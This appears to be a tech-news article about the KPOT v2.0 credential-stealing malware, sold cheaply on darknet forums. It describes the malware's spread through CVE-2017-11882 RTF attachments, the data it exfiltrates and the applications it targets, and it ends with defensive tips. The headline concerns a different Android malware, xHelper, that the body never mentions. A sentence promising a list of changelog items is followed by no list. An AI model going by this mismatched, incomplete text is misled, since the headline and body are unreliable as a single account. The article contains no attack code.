This Is How xHelper Reinstates Itself on Android Phones Even After Factory Reset
Last updated June 23, 2021
The KPOT stealer is one dangerous piece of malware targeting account information and other sensitive user data by monitoring and intercepting messenger apps, web browser, email, and even VPN traffic data. Having an already successful record out in the wild, malicious hackers have updated the exploitation kit and now sell KPOT v2.0 for $100 on darknet forums. The changelog of this version is quite extensive, with the following improvements and additions being the most notable:
Already, Proofpoint researchers have spotted email campaigns that try to spread the new KPOT, taking advantage of the CVE-2017-11882 exploit through RTF documents that are attached to the emails. There’s also an intermediate downloader that fetches a malicious Powershell script which includes a Base64-encoded payload. The command and control server remains the familiar HTTP one, with the responses from the C&C being encrypted.
The information that KPOT 2.0 can exfiltrate from the infected system includes hardware info, user names, external IP, OS version, machine GUID, keyboard layouts, and a list of the installed software. By identifying what’s there, KPOT activates the required credential stealing modules that cover the following software: Chrome, Firefox, Internet Explorer, Skype, Telegram, Discord, Battle.net, Steam, Jabber. Apart from these, KPOT can also steal various cryptocurrency files, FTP client accounts, Windows credentials, and even take screenshots.
The takeaway is that particularly capable stealers like the KPOT are now as cheap as $100, which makes their deployment more accessible and potentially widespread than ever. KPOT v2.0 may be able to exploit a broad spectrum of applications, but it’s important to remember that it all starts with you opening an unsolicited email. Don’t click on links found in email messages that come from addresses that you don’t recognize, don’t download attachments, and don’t run executables. If you don’t need macros on your office suite, disable them. Finally, use an AV solution from a reputable vendor and update it regularly.
Have something to say on the above? Do it by leaving a comment down below, or hop to our socials on Facebook and Twitter for more fresh news and tech stories.